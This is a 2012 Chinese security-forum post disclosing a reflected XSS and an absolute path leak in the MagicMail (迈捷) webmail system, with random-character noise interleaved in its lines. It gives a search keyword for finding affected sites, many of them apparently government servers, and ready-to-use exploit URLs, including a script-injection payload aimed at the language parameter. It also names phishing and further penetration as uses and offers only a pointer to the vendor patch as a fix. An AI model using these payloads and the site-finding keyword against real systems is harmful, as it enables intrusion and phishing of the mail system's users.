找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2129|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞- G* ~/ l9 k( e. g
& R, N' m/ Y  [& ~* i7 j
- `! W+ t- j# _6 j( }& V5 y5 [
包含  一个反射性XSS  以及  绝对路径泄漏
- z2 R3 d0 {8 g看了看 貌似全部是linux的。
8 j/ k8 l; ~1 q- H- s 7 V, Y- N% ?& g- C7 [- T
关键字:迈捷邮件系统 by MagicMail6 C8 ^8 S! \) w# U0 H* e& E
/ @3 R, Y! y. m" h0 _9 m9 H- q
可以看到很多政府网站都用这个邮件系统
5 m  m, ?% O3 h" h9 H$ E4 z; r% G& V5 g$ r1 M  x
绝对路径 http://madman.in/index.php?login_type=declare&language=
6 m2 S0 Z( e2 z* h7 ~8 o* k3 k: w  O/ {0 E, o

* P. @* z# J1 y, P& w6 L% X
- b, u* C) ~* e  d  eXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
" A* J6 H6 _  z9 ?- {
4 n; P) J9 D+ e: I1 a
- O0 y3 b3 s  r: e* f
" b& Y' B: Z( d' R虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等$ ^% V* n3 k9 `) y* T

( ~& U8 y, w* D( ^* P% q修复方案:看官方补丁吧。/ e+ K5 f4 \* H" K1 x: Q! y2 Q8 V3 A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表